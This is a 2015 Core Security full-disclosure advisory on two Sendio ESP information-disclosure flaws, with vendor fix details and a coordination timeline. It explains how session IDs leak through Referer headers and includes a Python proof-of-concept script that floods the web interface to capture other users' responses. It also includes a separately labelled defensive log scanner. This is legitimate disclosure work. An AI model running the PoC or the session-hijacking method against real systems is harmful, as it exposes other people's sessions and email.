
List:       full-disclosure
Subject:    [FD] [CORE-2015-0010] - Sendio ESP Information Disclosure Vulnerability
From:       CORE Advisories Team <advisories () coresecurity ! com>
Date:       2015-05-22 16:11:59
Message-ID: 555F554F.4000306 () coresecurity ! com

1. Advisory Information

Title: Sendio ESP Information Disclosure Vulnerability
Advisory ID: CORE-2015-0010
Advisory URL: http://www.coresecurity.com/advisories/sendio-esp-information-disclosure-vulnerability
Date published: 2015-05-22
Date of last update: 2015-05-22
Vendors contacted: Sendio
Release mode: Coordinated release


2. Vulnerability Information

Class: OWASP Top Ten 2013 Category A2 - Broken Authentication and Session Management [CWE-930], Information Exposure [CWE-200]
Impact: Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2014-0999, CVE-2014-8391



3. Vulnerability Description

Sendio [1] ESP (E-mail Security Platform) is a network appliance which provides anti-spam and anti-virus solutions for enterprises. Two information disclosure issues were found affecting some versions of this software; they can lead to leakage of sensitive information such as users' session identifiers and/or users' email messages.


4. Vulnerable Packages

Sendio 6 (14.1120.0)
Other products and versions might be affected too, but they were not tested.


5. Vendor Information, Solutions and Workarounds

Sendio informs us that [CVE-2014-0999] and [CVE-2014-8391] are fixed in Sendio software Version 7.2.4.

For [CVE-2014-0999], the vulnerability only exists for HTTP web sessions and not HTTPS web sessions. Sendio recommends that customers who have not upgraded to Version 7.2.4 disallow HTTP on their Sendio product and only use HTTPS.


6. Credits

This vulnerability was discovered and researched by Martin Gallo from Core Security's Consulting Services Team. The publication of this advisory was coordinated by Joaquín Rodríguez Varela from Core Security's Advisories Team.


7. Technical Description / Proof of Concept Code

7.1. Disclosure of session cookie in Web interface URLs

The Sendio [1] ESP Web interface authenticates users with a session cookie named "jsessionid". The vulnerability [CVE-2014-0999] is caused by the way the Sendio ESP Web interface handles this authentication cookie: the "jsessionid" cookie value is included in URLs when obtaining the content of emails. The URLs used by the application follow this format:


      http://<ESP-web-interface-domain>:<ESP-web-interface-port>/sendio/ice/cmd/msg/body;jsessionid=<session-identifier-value>?id=<message-id>

This causes the application to disclose the session identifier value, allowing attackers to perform session hijacking. An attacker might perform this kind of attack by sending an email message containing links or embedded image HTML tags pointing to a web site under their control, and then reading the victim's session identifier from the "Referer" HTTP header that the browser sends along with those requests. Accessing this authentication cookie might allow an attacker to hijack a victim's session and obtain access to email messages or perform actions on behalf of the victim.
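As an added illustration (not code from the advisory or from Sendio), the following Python flags access-log records whose request target or Referer carries a ";jsessionid=" path parameter in the URL format shown above, and rewrites such URLs so the identifier travels only in the Cookie header. The log lines, host names and session value are constructed, and the combined-log regular expression is an assumption about the log format.

```python
import re
from urllib.parse import urlsplit, urlunsplit

# Name of the session-id path parameter used by the Sendio ESP web interface (from the advisory).
SESSION_PARAM = "jsessionid"

# Assumed "combined" access-log layout: client ip, request line, status, size, referer, user agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d+) \S+ "(?P<referer>[^"]*)"'
)

# Constructed sample: a message fetch, a harmless listing, and a proxy record of an external
# image fetch whose Referer repeats the message URL (and with it the session id).
SAMPLE_LOG = [
    '10.0.0.5 - - [22/May/2015:16:11:59 +0000] "GET /sendio/ice/cmd/msg/body;jsessionid=ABC123DEF456?id=12345 HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [22/May/2015:16:12:03 +0000] "GET /sendio/ice/cmd/msg/list?page=1 HTTP/1.1" 200 4012 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [22/May/2015:16:12:10 +0000] "GET http://img.example.net/pixel.gif HTTP/1.1" 200 43 "http://esp.example:8888/sendio/ice/cmd/msg/body;jsessionid=ABC123DEF456?id=12345" "Mozilla/5.0"',
]


def session_path_param(target):
    """Return the jsessionid value embedded as a ';name=value' path parameter, or None.

    Servlet containers append path parameters to the last path segment, so they sit
    before the '?' and are not part of the query string; urlsplit leaves them in .path."""
    path = urlsplit(target).path
    for param in path.split(";")[1:]:
        name, sep, value = param.partition("=")
        if sep and name.lower() == SESSION_PARAM:
            return value
    return None


def strip_session_param(target):
    """Rewrite a URL so the session id is no longer carried in the path (cookie only)."""
    parts = urlsplit(target)
    segments = parts.path.split(";")
    kept = [p for p in segments[1:] if p.partition("=")[0].lower() != SESSION_PARAM]
    path = ";".join([segments[0]] + kept)
    return urlunsplit((parts.scheme, parts.netloc, path, parts.query, parts.fragment))


def find_session_leaks(log_lines):
    """Return (client ip, field, session id) for every record exposing a session id in a URL."""
    findings = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format record; skip rather than guess
        for field in ("target", "referer"):
            sid = session_path_param(m.group(field))
            if sid:
                findings.append((m.group("ip"), field, sid))
    return findings
```

Running find_session_leaks over the sample reports the same session id twice for 10.0.0.5: once in the message URL itself and once repeated in the Referer of the external image fetch, which is exactly the path by which a third-party site learns it.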

7.2. Response mixup in Web interface

The vulnerability [CVE-2014-8391] is caused by an improper handling of users' sessions by the Web interface. Under certain conditions, this could lead to the server disclosing sensitive information that was intended for a different user. This information includes, for instance, other users' session identifiers, email message identifiers or email message subjects. In order to trigger this vulnerability, requests should be authenticated.

The following Python script can be used to trigger this vulnerability under certain circumstances:


import requests

domain = "target.domain.com"                     # The target domain
port = 8888                                      # The target port
jsessionid = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"  # A valid jsessionid
num = 100000                                     # Number of requests to make
msgid = 9999999                                  # A valid message id to baseline the requests

url = "http://%s:%d/sendio/ice/cmd/msg/body;jsessionid=%s" % (domain, port, jsessionid)


def make_request(msg_id):
    params = {"id": str(msg_id)}
    headers = {"Cookie": "JSESSIONID=%s" % jsessionid}
    return requests.get(url, params=params, headers=headers)


print("[*] Reaching the target to define baseline")
r = make_request(msgid)
# The header value is a string; convert it so the comparison below is int against int
baseline_length = int(r.headers["content-length"])
print("[*] Defined baseline: %d bytes" % baseline_length)

# Repeat the same request; a 200 response whose length differs from the baseline
# indicates that content intended for a different session was returned
for i in range(num):
    r = make_request(msgid)
    rlength = int(r.headers["content-length"])
    if r.status_code == 200 and rlength != baseline_length:
        print("\t", r.status_code, rlength, r.text)
    else:
        print("\t", r.status_code, rlength)



8. Report Timeline

2015-03-26: Core Security sent an initial notification to Sendio informing them that multiple vulnerabilities were found in one of their products, and requested their PGP keys in order to start an encrypted communication.
2015-03-27: Sendio replied that they would not be able to use PGP keys, but stated that their In/out SMTP gateway uses TLS, so that should suffice. They detailed that they were working on a fix for the "CS_SENDIO_JSESSIONID_DISCLOSURE" vulnerability and estimated it would be released by the end of April, 2015. They requested additional technical details for the "CS_SENDIO_INFO_LEAK" vulnerability.
2015-03-30: Core Security informed Sendio that they understood that Sendio may not be able to use PGP keys, but that Core doesn't consider the use of TLS a replacement for PGP. Core Security requested confirmation from Sendio in case they wanted to keep the communications unencrypted (without PGP) in order to send them a draft version of the advisory.
2015-03-30: Sendio confirmed that the communication can remain "as is" without PGP. They will inform Core once they have a specific date for publishing the fix. Sendio requested a PoC for the "CS_SENDIO_INFO_LEAK" vulnerability.
2015-03-31: Core Security sent a draft version of the advisory and PoC to Sendio.
2015-03-31: Sendio confirmed reception of the advisory and PoC and informed Core that they would provide an update on their test on April 6.
2015-04-06: Sendio informed Core that they were able to reproduce the "CS_SENDIO_INFO_LEAK" issue and that they were still analyzing it in order to create a fix.
2015-04-07: Core Security requested an estimated date for the release of a fix/update.
2015-04-13: Core Security again requested an answer from Sendio regarding the release of a fix/update.
2015-04-13: Sendio informed Core they were still working on a fix for the JSession issue that covers all use cases across Microsoft Outlook and the various supported web browsers. For the "CS_SENDIO_INFO_LEAK" they had coded a fix that was undergoing a System Test. Sendio estimated the release would take place on May 15, 2015.
2015-04-20: Sendio informed Core they were still planning to release the fixes by May 15, 2015.
2015-04-20: Core Security thanked Sendio for the update and informed them they would schedule their security advisory accordingly.
2015-04-24: Core Security requested that Sendio delay the release date of the fixes until Monday, May 18 in order to avoid publishing them on a Friday.
2015-04-27: Sendio informed Core that many of their customers have their Sendio systems set to "automatically update" on weekends. Sendio requested Core publish their advisory a week after the fix is published. Sendio also requested the ability to add some workarounds into Core's advisory.
2015-04-28: Core Security informed Sendio that they understood their update policy and let them know that it is Core's policy to publish their advisory the same day the fix is released in order to inform the affected users of its availability. Core also stated that they were willing to add any workarounds Sendio proposed.
2015-05-05: Sendio informed Core that they were still having problems developing a fix for the JSession vulnerability, and therefore they may have to postpone the release date from May 15 to May 22.
2015-05-07: Core Security thanked Sendio for the update and requested to be kept informed in order to have enough time to schedule their advisory.
2015-05-12: Sendio confirmed that they needed to delay the publication of the fixes until May 21. Additionally, Sendio sent Core the proposed workarounds to be added in Core's advisory and requested a draft copy of it.
2015-05-15: Core Security informed Sendio it would reschedule the publication of their advisory and would send them a draft copy of it once they produced the final version.
2015-05-20: Sendio informed Core that they would publish the fixes at 10 PM, May 21.
2015-05-20: Core Security informed Sendio that based on their publication time they would have to delay the release of the advisory until Friday, May 22.
2015-05-22: Advisory CORE-2015-0010 published.


9. References

[1] http://www.sendio.com/


10. About CoreLabs

CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.


11. About Core Security Technologies

Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.

Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.


12. Disclaimer

The contents of this advisory are copyright (c) 2015 Core Security and (c) 2015 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/


13. PGP/GPG Keys

This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.


